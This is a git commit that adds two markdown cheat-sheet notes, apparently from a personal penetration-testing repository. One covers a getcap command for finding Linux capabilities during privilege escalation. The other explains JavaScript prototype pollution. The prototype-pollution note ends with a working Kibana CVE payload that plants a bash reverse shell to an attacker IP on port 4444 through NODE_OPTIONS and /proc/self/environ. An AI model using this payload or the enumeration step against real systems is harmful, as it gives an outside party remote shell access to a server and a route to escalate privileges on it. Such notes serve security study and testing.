added prototype pollution

2021-09-03 00:58:49 +02:00 · 2021-09-03 00:58:49 +02:00 · 5b7c1e98f0
parent eebda8afbc
commit 5b7c1e98f0
2 changed files with 39 additions and 0 deletions
--- a/exploit/linux/capabilities.md
+++ b/exploit/linux/capabilities.md
@ -0,0 +1,8 @@
+# Capabilities
+
+* [HackTricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities)
+
+## Usage
+```sh
+getcap -r  / 2>/dev/null
+```
--- a/exploit/prototype_pollution.md
+++ b/exploit/prototype_pollution.md
@ -0,0 +1,31 @@
+# Prototype Pollution
+
+* Overwrite built in properties, like constructor, toString of an object.
+* Any other instance inherits properties from `Object.__proto__`. toString() is inherited by all objects.
+## Usage
+* Access to prototype inside object, as an example Javascript
+```javascript
+obj.__proto__
+Object.prototype
+```
+* Create object 
+```javascript
+let obj = {}
+```
+* Create properties inside `__proto__`.
+```javascript
+obj.__proto__.isAdmin = true
+```
+
+### Start Node commands
+* Use 
+    * `require`
+    * `eval`
+
+### Kibana CVE 2019
+* Write reverse bash into variable
+```javascript
+.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i >& /dev/tcp/<attacker-IP>/4444 0>&1\'");//')
+.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
+```
+